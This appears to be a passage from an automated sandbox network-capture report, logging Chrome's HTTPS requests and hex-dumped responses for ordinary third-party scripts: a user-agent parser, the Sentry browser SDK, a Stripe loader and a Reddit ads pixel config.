                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29 2f 69 2c 2f 28 6d 69 63 72 6f 73 6f 66 74 29 3b 20 28 6c 75 6d 69 61 5b 5c 77 20 5d 2b 29 2f 69 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)/i,/(microsoft); (lumia[\w ]+)/i,
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 4c 76 54 65 6c 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 70 68 2d 31 29 20 2f 69 5d 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,"LvTel"],f,[d,m]],[/\b(ph-1) /i],
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 44 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 79 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 67 6c 61 73 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,M],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,D],[d,g]],[/((pebble))app/i],[v,f,[d,y]],[/droid.+; (glass


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        86192.168.2.1649824151.101.2.2174436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC366OUTGET /7.19.0/bundle.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 55680
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Thu, 02 Oct 2025 06:45:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 10 Nov 2022 15:50:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"991179f6b28b6971d59ce6e652d0432a"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1140733
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 39 2e 30 20 28 31 38 31 38 34 38 33 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 5d 22 3a 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! @sentry/browser 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":ret
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 5b 5d 3b 6c 65 74 20 69 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 72 2e 70 75 73 68 28 60 5b 24 7b 74 5b 30 5d 7d 3d 22 24 7b 74 5b 31 5d 7d 22 5d 60 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 65 2e 69 64 26 26 72 2e 70 75 73 68 28 60 23 24 7b 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [];let i,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forEach((t=>{r.push(`[${t[0]}="${t[1]}"]`)}));else if(e.id&&r.push(`#${e
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 45 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 22 22 3b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b 6e 3c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: protocol:e,publicKey:r})}(t):E(t)}const S=["debug","info","warn","error","log","assert","trace"];function x(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n)}...`}function j(t,n){if(!Array.isArray(t))return"";const e=[];for(let n=0;n<
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 74 2e 6b 65 79 73 28 49 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 78 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c 65 6e 67 74 68 3e 6e 29 29 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 6c 65 6e 67 74 68 3f 72 3a 78 28 72 2c 6e 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 72 65 74 75 72 6e 20 4c 28 74 2c 6e 65 77 20 4d 61 70 29 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t.keys(I(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return x(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.length>n))return t===e.length?r:x(r,n)}return""}function A(t){return L(t,new Map)}functio
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 6f 6e 73 74 20 58 3d 70 28 29 2c 7a 3d 7b 7d 2c 57 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 74 29 7b 69 66 28 21 57 5b 74 5d 29 73 77 69 74 63 68 28 57 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: aders,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function B(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}const X=p(),z={},W={};function J(t){if(!W[t])switch(W[t]=!0,t){case"console":!func
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 58 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 4f 28 74 2c 22 6f 70 65 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2c 72 3d 6e 5b 31 5d 2c 69 3d 65 2e 5f 5f 73 65 6e 74 72 79 5f 78 68 72 5f 5f 3d 7b 6d 65 74 68 6f 64 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ntation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in X))return;const t=XMLHttpRequest.prototype;O(t,"open",(function(t){return function(...n){const e=this,r=n[1],i=e.__sentry_xhr__={method:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 51 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 58 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 47 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 29 29 7d 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 73 74 6f 72 79 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q(n)},startTimestamp:Date.now()};return G("fetch",{...e}),t.apply(X,n).then((t=>(G("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw G("fetch",{...e,endTimestamp:Date.now(),error:t}),t}))}}))}();break;case"history":!function(){if(!function
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 58 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 59 3b 6c 65 74 20 5a 2c 74 74 3b 66 75 6e 63 74 69 6f 6e 20 6e 74 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 74 74 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6b 65 79 70 72 65 73 73 22 21 3d 3d 74 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 6e 7c 7c 21 6e 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 49 4e 50 55 54 22 3d 3d 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: string"==typeof t[0]?t[0]:"Request"in X&&h(t[0],Request)?t[0].url:String(t[0])}let Y;let Z,tt;function nt(t,n=!1){return e=>{if(!e||tt===e)return;if(function(t){if("keypress"!==t.type)return!1;try{const n=t.target;if(!n||!n.tagName)return!0;if("INPUT"===n
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 69 66 28 74 26 26 74 2e 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 54 28 74 2c 22 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 22 2c 21 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 74 28 74 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: chanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function at(t){if(t&&t.__sentry_captured__)return!0;try{T(t,"__sentry_captured__",!0)}catch(t){}return!1}function ft(t){return
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1379INData Raw: 70 65 6f 66 20 6e 26 26 6e 21 3d 6e 3f 22 5b 4e 61 4e 5d 22 3a 76 6f 69 64 20 30 3d 3d 3d 6e 3f 22 5b 75 6e 64 65 66 69 6e 65 64 5d 22 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 46 75 6e 63 74 69 6f 6e 3a 20 24 7b 50 28 6e 29 7d 5d 60 3a 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 24 7b 53 74 72 69 6e 67 28 6e 29 7d 5d 60 3a 22 62 69 67 69 6e 74 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 60 5b 42 69 67 49 6e 74 3a 20 24 7b 53 74 72 69 6e 67 28 6e 29 7d 5d 60 3a 60 5b 6f 62 6a 65 63 74 20 24 7b 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 7d 5d 60 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: peof n&&n!=n?"[NaN]":void 0===n?"[undefined]":"function"==typeof n?`[Function: ${P(n)}]`:"symbol"==typeof n?`[${String(n)}]`:"bigint"==typeof n?`[BigInt: ${String(n)}]`:`[object ${Object.getPrototypeOf(n).constructor.name}]`}catch(t){return`**non-serializ


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        87192.168.2.1649826216.137.52.1114436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC400OUTGET /v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: js.stripe.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC727INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 526
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 22 Nov 2024 21:05:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:37:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "d96c709017743c0759cf3853d1806ba5"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 2f60289312992373b517623785f072a2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1340
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-P2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: OHrHatCRAqsaUzRVzOmzVEmUwWtaZUwTLk5UbibhO9pnYPuPRDTRiQ==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC526INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 73 74 72 69 70 65 2e 6e 65 74 77 6f 72 6b 22 2c 6e 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2c 74 3d 2f 70 72 65 76 69 65 77 3d 74 72 75 65 2f 2e 74 65 73 74 28 6e 29 3f 22 69 6e 6e 65 72 2d 70 72 65 76 69 65 77 2e 68 74 6d 6c 22 3a 22 69 6e 6e 65 72 2e 68 74 6d 6c 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 6f 2e 73 72 63 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 6e 29 3b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 2e 6f 72 69 67 69 6e 3d 3d 3d 65 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){va


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        88192.168.2.1649827151.101.1.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC404OUTGET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
